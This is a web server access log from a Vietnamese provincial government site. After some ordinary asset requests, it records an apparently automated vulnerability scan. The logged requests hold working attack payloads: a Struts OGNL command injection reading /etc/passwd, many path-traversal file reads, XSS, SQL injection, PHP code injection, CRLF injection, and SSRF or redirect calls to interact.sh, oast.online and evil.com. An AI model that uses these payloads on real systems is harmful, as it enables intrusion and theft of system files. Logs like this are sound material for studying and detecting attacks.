2023-10-13 01:14:18 103.153.214.94 GET /data-table.ttf - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:18 103.153.214.94 GET /data-table.svg - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:18 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 269
2023-10-13 01:14:19 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:19 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:19 103.153.214.94 GET /ui-icons_222222_256x240.png - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:21 103.153.214.94 GET /Avenir_Next_W00_400.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 535
2023-10-13 01:14:21 103.153.214.94 GET /Avenir_Next_W00_400.woff2 - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 276
2023-10-13 01:14:23 103.153.214.94 GET /Avenir_Next_W00_400.woff - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1972
2023-10-13 01:14:25 103.153.214.94 GET /Avenir_Next_W00_400.ttf - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1944
2023-10-13 01:14:27 103.153.214.94 GET /Avenir_Next_W00_400.svg - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2214
2023-10-13 01:14:27 103.153.214.94 GET /Avenir_Next_W00_Italic_400.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 537
2023-10-13 01:14:28 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff2 - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 536
2023-10-13 01:14:30 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1171
2023-10-13 01:14:32 103.153.214.94 GET /Avenir_Next_W00_Italic_400.ttf - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2143
2023-10-13 01:14:37 103.153.214.94 GET /Avenir_Next_W00_Italic_400.svg - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4950
2023-10-13 01:14:38 103.153.214.94 GET /Avenir_Next_W00_600.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1405
2023-10-13 01:14:38 103.153.214.94 GET /Avenir_Next_W00_600.woff2 - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 807
2023-10-13 01:14:41 103.153.214.94 GET /Avenir_Next_W00_600.woff - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1339
2023-10-13 01:14:43 103.153.214.94 GET /Avenir_Next_W00_600.ttf - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2742
2023-10-13 01:14:48 103.153.214.94 GET /Avenir_Next_W00_600.svg - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4283
2023-10-13 01:14:48 103.153.214.94 GET /Avenir_Next_W00_Italic_600.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 805
2023-10-13 01:14:50 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff2 - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 803
2023-10-13 01:14:52 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2134
2023-10-13 01:14:54 103.153.214.94 GET /Avenir_Next_W00_Italic_600.ttf - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2403
2023-10-13 01:14:59 103.153.214.94 GET /Avenir_Next_W00_Italic_600.svg - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4806
2023-10-13 01:14:59 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 803
2023-10-13 01:15:01 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 64 1050
2023-10-13 01:15:01 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 500 19 64 52727
2023-10-13 01:15:32 103.153.214.94 GET /en-US/splunkd/__raw/services/server/info/server-info output_mode=json 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 208
2023-10-13 01:15:33 103.153.214.94 GET /__raw/services/server/info/server-info output_mode=json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204
2023-10-13 01:16:23 103.153.214.94 GET /users/registration - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 206
2023-10-13 01:16:29 103.153.214.94 GET /index.php/community/ %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 01:18:27 103.153.214.94 GET /jkstatus - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207
2023-10-13 01:18:33 103.153.214.94 GET /jkstatus; - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203
2023-10-13 01:19:27 103.153.214.94 GET /${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('cat+/etc/passwd').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new++java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208
2023-10-13 01:21:32 103.153.214.94 GET /interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 207
2023-10-13 01:22:13 103.153.214.94 GET /img.php f=/./etc/./passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 635
2023-10-13 01:22:33 103.153.214.94 GET /cgi-bin/login LD_DEBUG=files 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206
2023-10-13 01:22:55 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 01:22:57 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204
2023-10-13 01:23:06 103.153.214.94 GET /cms/info.php mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205
2023-10-13 01:24:56 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 217
2023-10-13 01:25:48 103.153.214.94 GET /echo-server.html code=test&state=http://www.interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 01:26:00 103.153.214.94 GET /index.php target=db_sql.php%253f/../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 586
2023-10-13 01:26:17 103.153.214.94 GET /web/cgi-bin/hi3510/param.cgi cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206
2023-10-13 01:27:51 103.153.214.94 GET /static/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 11 0 210
2023-10-13 01:27:53 103.153.214.94 GET /spring-mvc-showcase/resources/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 11 0 207
2023-10-13 01:28:37 103.153.214.94 POST /account - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 205
2023-10-13 01:28:39 103.153.214.94 POST /account - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 204
2023-10-13 01:30:33 103.153.214.94 GET /index.php op=fileviewer&file=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205
2023-10-13 01:35:59 103.153.214.94 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 207
2023-10-13 01:40:04 103.153.214.94 PUT /meta - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 204
2023-10-13 01:40:58 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206
2023-10-13 01:42:15 103.153.214.94 GET /assets/php/filebrowser/filebrowser.main.php file=../../../../../../../../../../etc/passwd&do=download 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 206
2023-10-13 01:42:21 103.153.214.94 GET /zimbra/h/search si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 585
2023-10-13 01:42:40 103.153.214.94 GET /message title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204
2023-10-13 01:42:42 103.153.214.94 GET /remote/error errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208
2023-10-13 01:43:51 103.153.214.94 GET /login next=http://interact.sh/?app.scan/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 206
2023-10-13 01:43:53 103.153.214.94 GET /signup next=http://interact.sh/?app.scan/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 209
2023-10-13 01:43:59 103.153.214.94 GET /www.interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 206
2023-10-13 01:44:17 103.153.214.94 POST /filemanager/upload.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 935
2023-10-13 01:45:11 103.153.214.94 GET /cgit/cgit.cgi/git/objects/ path=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
2023-10-13 01:45:21 103.153.214.94 GET /webui/file_guest path=/var/www/documentation/../../../../../etc/passwd&flags=1152 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205
2023-10-13 01:45:38 103.153.214.94 GET /IntellectMain.jsp IntellectSystem=https://www.interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 208
2023-10-13 01:47:22 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 01:47:24 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 01:50:38 103.153.214.94 GET /index.php/System/MailConnect/host/ckjv7uic8b6p3donsoogftjsmkobxb36c.oast.online/port/80/secure/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209
2023-10-13 01:53:58 103.153.214.94 GET /filemanager/ajax_calls.php action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 206
2023-10-13 01:56:25 103.153.214.94 GET /WEBACCOUNT.CGI OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 01:57:23 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 206
2023-10-13 01:57:25 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2WfF0k3ekdfz1Njf91CNqo3GVtv.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 01:59:31 103.153.214.94 POST /fcgi-bin/wgsetcgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 205
2023-10-13 02:01:10 103.153.214.94 GET /bibliopac/bin/wxis.exe/bibliopac/ IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 8 0 210
2023-10-13 02:01:47 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 209
2023-10-13 02:02:06 103.153.214.94 POST /upload - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 209
2023-10-13 02:03:17 103.153.214.94 GET /wp-content/plugins/wechat-broadcast/wechat/Image.php url=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 02:04:43 103.153.214.94 GET /wp-content/plugins/localize-my-post/ajax/include.php file=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 209
2023-10-13 02:04:57 103.153.214.94 GET /nuxeo/login.jsp/pwn${31333333330+7}.xhtml - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 11 0 208
2023-10-13 02:05:13 103.153.214.94 GET /blast/nph-viewgif.cgi ../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 02:06:29 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206
2023-10-13 02:07:10 103.153.214.94 GET /select_project.php url=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207
2023-10-13 02:07:12 103.153.214.94 GET /clock_status.php current_page=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204
2023-10-13 02:09:51 103.153.214.94 GET /plugins/captcha/crypt/cryptographp.php cfg=1%0D%0ASet-Cookie:%20crlfinjection=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 212
2023-10-13 02:13:29 103.153.214.94 GET /api/console/api_server sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 0 2 220
2023-10-13 02:15:58 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 207
2023-10-13 02:19:22 103.153.214.94 GET /html/common/forward_js.jsp FORWARD_URL=http://evil.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201
2023-10-13 02:19:24 103.153.214.94 GET /html/portlet/ext/common/page_preview_popup.jsp hostname=evil.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 02:19:24 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203
2023-10-13 02:19:30 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 02:20:10 103.153.214.94 POST /wp-admin/admin.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 199
